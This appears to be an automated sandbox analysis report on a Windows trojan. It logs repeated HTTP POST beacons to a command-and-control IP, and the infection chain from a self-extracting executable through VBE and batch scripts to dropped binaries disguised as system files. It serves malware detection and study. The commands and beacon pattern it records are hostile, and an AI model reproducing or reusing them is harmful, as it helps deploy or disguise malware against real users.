                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2500Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2500Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1572Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1600Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2500Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1600Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1600Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1600Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2500Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1600Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2488Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1600Expect: 100-continueConnection: Keep-Alive
                          Source: unknown TCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknown HTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 185.239.51.56 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                          Source: RuntimeBroker.exe, 00000009.00000002.2887155289.00000000032D8000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000009.00000002.2887155289.0000000003131000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000009.00000002.2887155289.0000000003350000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.239.51.56
                          Source: RuntimeBroker.exe, 00000009.00000002.2887155289.000000000300B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.239.51.56/
                          Source: RuntimeBroker.exe, 00000009.00000002.2887155289.00000000032D8000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000009.00000002.2887155289.0000000003131000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000009.00000002.2887155289.0000000003350000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.239.51.56/externalVmpacketlongpollSqldbFloweruniversalCentral.php
                          Source: RuntimeBroker.exe, 00000009.00000002.2887155289.0000000003350000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.239H
                          Source: ComponentBrokermonitor.exe, 00000004.00000002.1765850091.0000000003358000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000009.00000002.2887155289.0000000003131000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: C:\Recovery\RuntimeBroker.exe Window created: window name: CLIPBRDWNDCLASS

                          System Summary

                          Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Code function: 0_2_00E06FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 0_2_00E06FAA
                          Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\ERuFRGqx.log 75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Code function: String function: 00E1EB78 appears 39 times
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Code function: String function: 00E1EC50 appears 56 times
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Code function: String function: 00E1F5F0 appears 31 times
                          Source: voed9G7p5s.exe, 00000000.00000003.1646097008.0000000006A4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs voed9G7p5s.exe
                          Source: voed9G7p5s.exe, 00000000.00000003.1649134504.0000000000644000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs voed9G7p5s.exe
                          Source: voed9G7p5s.exe, 00000000.00000003.1649059906.000000000063D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe.mui` vs voed9G7p5s.exe
                          Source: voed9G7p5s.exe, 00000000.00000003.1649059906.000000000063D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs voed9G7p5s.exe
                          Source: voed9G7p5s.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: classification engine Classification label: mal100.troj.evad.winEXE@18/31@0/1
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Code function: 0_2_00E06C74 GetLastError,FormatMessageW, 0_2_00E06C74
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Code function: 0_2_00E1A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree, 0_2_00E1A6C2
                          Source: C:\savesSession\ComponentBrokermonitor.exe File created: C:\Program Files (x86)\msecache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exe
                          Source: C:\savesSession\ComponentBrokermonitor.exe File created: C:\Users\user\Desktop\yIzGwiSf.log
                          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_03
                          Source: C:\Recovery\RuntimeBroker.exe Mutant created: NULL
                          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
                          Source: C:\Recovery\RuntimeBroker.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\554f049d678a045e30ca1c0b02f850d36d0223cd7b5055b518f68280165f163e
                          Source: C:\savesSession\ComponentBrokermonitor.exe File created: C:\Users\user\AppData\Local\Temp\S2ennV6xhF
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Command line argument: sfxname 0_2_00E1DF1E
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Command line argument: sfxstime 0_2_00E1DF1E
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Command line argument: STARTDLG 0_2_00E1DF1E
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Command line argument: xz 0_2_00E1DF1E
                          Source: voed9G7p5s.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Recovery\RuntimeBroker.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe File read: C:\Windows\win.ini
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: voed9G7p5s.exe Virustotal: Detection: 58%
                          Source: voed9G7p5s.exe ReversingLabs: Detection: 71%
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe File read: C:\Users\user\Desktop\voed9G7p5s.exe
                          Source: unknown Process created: C:\Users\user\Desktop\voed9G7p5s.exe "C:\Users\user\Desktop\voed9G7p5s.exe"
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\savesSession\Ay6OSRVd54M0URboub1xHjGCi4U1zMZmQyA39xBzO7chiTURiJbZUgQ.vbe"
                          Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\savesSession\4pVzEVKfbvkCEJ9qYser3z0xImhTTPHqTDWOugPvvPYsbZ7.bat" "
                          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\savesSession\ComponentBrokermonitor.exe "C:\savesSession/ComponentBrokermonitor.exe"
                          Source: C:\savesSession\ComponentBrokermonitor.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uT6K3ltlhZ.bat"
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Recovery\RuntimeBroker.exe "C:\Recovery\RuntimeBroker.exe"
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Section loaded: version.dll
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Section loaded: dxgidebug.dll
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Section loaded: sfc_os.dll
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Section loaded: sspicli.dll
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Section loaded: rsaenh.dll
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Section loaded: uxtheme.dll
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Section loaded: dwmapi.dll
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Section loaded: cryptbase.dll
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Section loaded: riched20.dll
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Section loaded: usp10.dll
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Section loaded: msls31.dll
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Section loaded: windowscodecs.dll
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Section loaded: textshaping.dll
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Section loaded: textinputframework.dll
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Section loaded: coreuicomponents.dll
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Section loaded: coremessaging.dll
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Section loaded: ntmarta.dll
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Section loaded: wintypes.dll
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: policymanager.dllJump to behavior
